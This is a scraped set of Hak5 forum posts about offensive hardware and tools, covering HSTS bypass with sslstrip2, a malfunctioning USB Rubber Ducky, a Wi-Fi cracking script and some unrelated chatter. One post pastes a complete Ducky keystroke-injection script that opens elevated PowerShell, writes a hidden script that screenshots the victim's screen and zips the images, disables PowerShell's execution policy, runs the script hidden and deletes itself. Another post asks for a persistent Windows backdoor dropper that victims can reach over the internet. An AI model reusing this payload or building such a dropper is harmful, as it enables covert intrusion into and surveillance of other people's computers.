Search the Community

Video down below .

After reading countless threads about SSLSTRIP not working on systems such as Safari, Firefox, and Chrome I wanted to inquire about something that was released at Defcon Asia... SSLSTRIP 2 and DNS2PROXY https://github.com/LeonardoNve/sslstrip2 This is a new version of Moxie´s SSLstrip with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism. This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 OFFENSIVE: EXPLOITING DNS SERVERS CHANGES for more information. For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it athttps://github.com/LeonardoNve/dns2proxy. Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48 The DNS Proxy I am having a really hard time following the instructions, I've tried to contact the developer for clarification but no luck. Anyone else care to chime in on how to setup dns2proxy? - > Also is there anyone willing to take on the challenge on adding this as an infusion to the pineapple? My understanding is this would allow you to compromise all browsers such as Safari, Chrome, and Firefox? The demo video interestingly enough shows quite vividly proof of concept -- just trying to figure out how to do this? I'm running a few Kali Linux machines, can someone clarify how I'm supposed to setup the DNS proxy? To the ENTIRE Hak5 Team; Thankyou for working on a device that is truly amazing and endless with opportunity. We are only limited by our creativity when it comes to deployment with this awesome device. I took it upon myself to invest in all the bells and whistles that came with the Mark 5. Lets talk about build quality - FIRST CLASS! This thing is scary - To the untrained eye you wouldn't have ANY idea what it is... To the trained idea, the only term that comes to mind is pwned and operated. PineAP: ... so thats what Dogma does -- and thats why karma doesn't work as expected anymore :D -- Soooo many questions on this forum could be answered by watching this regarding Karma.. Chris Haralson https://www.youtube.com/channel/UCK15ED34btB3NZznGIXQuwA This guys videos and guides are first class - aimed at people with my skill sets I really couldn't ask for anything to be clearer. I am anxiously awaiting your future guides and videos.. (*I check back everyday*). My office :D And a snazzy little pic of some pineapples....

So, today, with a new problem. EDIT: This is what KKP ( A keylogger ) logged when I hit the button to start the script ** [Ctrl][Alt][AltGr][up][End][Ctrl][Windows][Ctrl][AltGr][End][Alt][AltGr]#[Ctrl][AltGr][Alt][Ctrl][AltGr][Ctrl][AltGr][Ctrl][Windows][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows][AltGr][Alt][AltGr][PageUp][Windows]J[Ctrl][Windows][AltGr][Alt][AltGr][PageDown][Ctrl][Alt][Ctrl][AltGr] [NumLock][Ctrl][Alt][Windows][Alt][AltGr][Alt][Windows][AltGr][MenuClick][Ctrl][Windows][Ctrl][AltGr][PageUp][Alt][Ctrl][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][scrollLock][Ctrl][Alt][Windows][AltGr][Ctrl][Alt][AltGr][Ctrl][AltGr][Alt][Windows]>[Windows][Ctrl][AltGr][MenuClick][Ctrl][Alt][Windows][MenuClick][Ctrl][Alt][AltGr][Alt][Ctrl][AltGr][PageDown][Ctrl][AltGr][F12][Windows]J[Ctrl][Alt][AltGr][F11][Ctrl][AltGr][Delete][End][Ctrl][Ctrl][Alt][Windows][Ctrl][Ctrl][AltGr][Ctrl][AltGr][Alt][Windows][AltGr][insert][/scrollLock][Ctrl][Alt][AltGr][Cancel][Alt][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Alt][Windows][AltGr][Ctrl]>[Ctrl][Windows][AltGr][Ctrl][Alt][Windows][AltGr][Ctrl][Ctrl][AltGr][Ctrl][AltGr][PageUp][Ctrl][Alt][Windows] ** That's all that was logged. HELP! can I get a email address to hak5? Last time they just sent me here. Is there a way to contact Darren himself? It's sad when a company just sends you to a useless forum without even helping. Every ducky script leads to the 'CTRL + ALT + DEL' screen. I originally thought it was just someones bad scripting, but it turns out everything does it, either at the beginning or half way through to script. ( Both Win7/8 tried on two Windows 7 comps and one Windows 8 ) One of the Win7 comps and the Win8 comp have NUM Keys. **Example Script** DELAY 3000 GUI r DELAY 750 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory ENTER STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth ENTER STRING $displayWidth = $displayInfo.ScreenWidth ENTER STRING $displayHeight = $displayInfo.ScreenHeight ENTER STRING [system.Reflection.Assembly]::LoadWithPartialName("System.Drawing") ENTER STRING $x = 0 ENTER STRING do { Start-Sleep -Seconds 60 ENTER STRING $jpegName = (get-date).ToString('HHmmss') ENTER STRING $image = new-object System.Drawing.Bitmap 1366 ,768 ENTER STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight ENTER STRING $screen = [system.Drawing.Graphics]::FromImage($image) ENTER STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([system.Drawing.CopyPixelOperation]::SourceCopy)) ENTER STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg)); ENTER STRING $x++ } while ($x -ne 1); ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = '/public\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1500 STRING C:\Windows\config.ps1 ENTER DELAY 2000 ALT F4 DELAY 200 GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1500 ALT y DELAY 500 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 100 STRING m DELAY 200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1000 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER **** I just don't know what to do anymore. Someone help. The scripts came from online. I've tried saving the .bin file on multiple computers, so it's not that. I hope Darren sees this and helps me.. I just don't know what to do, I've tried everything. EDIT:: I've also tried the simple " Hello world " script, same result. ALSO:; The microSD card wont save any new data?

[Help] I need a backdoor dropper for the ducky, or help on making one. What it needs to do: Work on windows (victim) Work over the internet Be sort-of fast (like, not typing out stuff forever) Persistent (Across reboots) I can use LINUX, BACKTRACK, WINDOWS, or any other linux distro, like KALI. I can also upload an exe to mediafire for wget and execute (I don't need help with that). I just need help making the file and or ducky script. -Thanks in advance.

So I recently ordered a micro-micro usb cable to try out kos's code for p2p-adb. When I was ordering I noticed a "Special Requests" box. So I asked for a picture of a dinosaur to be included. Upon opening my package I saw a folded piece of paper. http://imgur.com/tJr7IOF (sorry, dont know/want to take the time to figure out how to put directly into post) Darren (as far as I can tell from the signature, sorry if not Darren!) included a signed picture of an ascii dinosaur! I just wanted to come here to say thank you very much! Also expect an order for a WiFi Pineapple pretty soon. ;)

You should hit update inside your WIFI-CRACKER or use the source below that has also been updated... UPDATE 3 : v1.2.3 is up and running with a couple fixes here and there since 2012... UPDATE : This is the new WIFI-CRACKER v1.2 where many things have been fixed and a few added. New functions include a updater and a packet sniffing menu. Same download link as before and you won't ever need to physically use it ever again ;) . Since this is my favorite IT show and because it inspired me to learn about wifi and write this script , I've decided that I will first post my WIFI-CRACKER script on those forums. WIFI-CRACKER is a Script that automated the hacking of wifi networks. It's completely created by me, in fact I made it today. It's a proof of concept and was created for educational purposes (since I was learning about wifi). I am planning to make it much more than cracking your neighbor's WIFI because honestly that's would be too easy for anyone on here. Currently, I want to add some more cracking options to the script as well as a DAuth menu. I'd appreciate if anyone wants to contribute on this project. Features : Mac spoofing with macchanger Target scouting with airodump-ng Cracking WEP and WPA/2 (with aircrack-ng and reaver) Debugging menu for fixing bugs Lots of small stuff to make the script as good as it can be Packet sniffing menu with tshark and wireshark *NEW* Updater function *NEW* Resume previous WPA hacking session *NEW* Fixed check_internet() Download link : Download Here Source code *UPDATED* :